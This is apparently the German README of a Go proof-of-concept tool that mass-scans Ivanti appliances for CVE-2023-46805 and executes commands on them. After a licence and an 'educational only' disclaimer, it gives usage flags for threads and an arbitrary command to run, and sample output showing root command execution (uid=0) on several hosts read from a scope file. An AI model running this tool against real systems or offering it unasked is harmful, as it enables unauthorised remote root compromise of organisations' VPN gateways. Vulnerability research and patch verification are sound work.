
CVE-2023-46805 Ivanti POC RCE - Ultra schneller Scanner.
Title: Proof of Concept für CVE-2023-46805 – Nur für Bildungszwecke
Lizenz: Dieses Werk ist unter der Creative Commons Namensnennung 4.0 International Lizenz (CC BY 4.0) lizenziert. Sie sind frei, dieses Werk zu teilen, zu kopieren, zu verbreiten und zu übertragen, es anzupassen oder für andere Zwecke zu nutzen, sofern die Urheberschaft angemessen genannt wird.
Haftungsausschluss: Dieser Proof of Concept (PoC) wird ausschließlich für Bildungs- und Cybersicherheitsforschungszwecke bereitgestellt. Weder der Autor, die verbundene Organisation noch andere an der Erstellung, Produktion oder Bereitstellung dieses Inhalts beteiligte Parteien haften für Schäden, einschließlich, aber nicht beschränkt auf direkte, indirekte, zufällige, besondere, Folgeschäden oder Strafschadensersatz, die aus der Nutzung oder Unfähigkeit zur Nutzung dieses Inhalts entstehen.
Bildungsziel: Dieser PoC soll der Cybersicherheitsgemeinschaft helfen, die als CVE-2023-46805 identifizierte Schwachstelle zu verstehen und zu entschärfen. Er sollte nicht in einer Produktionsumgebung oder für böswillige Aktivitäten verwendet werden.
Schwachstellenbeschreibung: Ivanti RCE
PoC-Details:
Usage of ./CVE-Ivanti:
-cmd string
The command to replace 'id' in the payload (default "id")
-t int
Number of concurrent threads (default 5)
go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'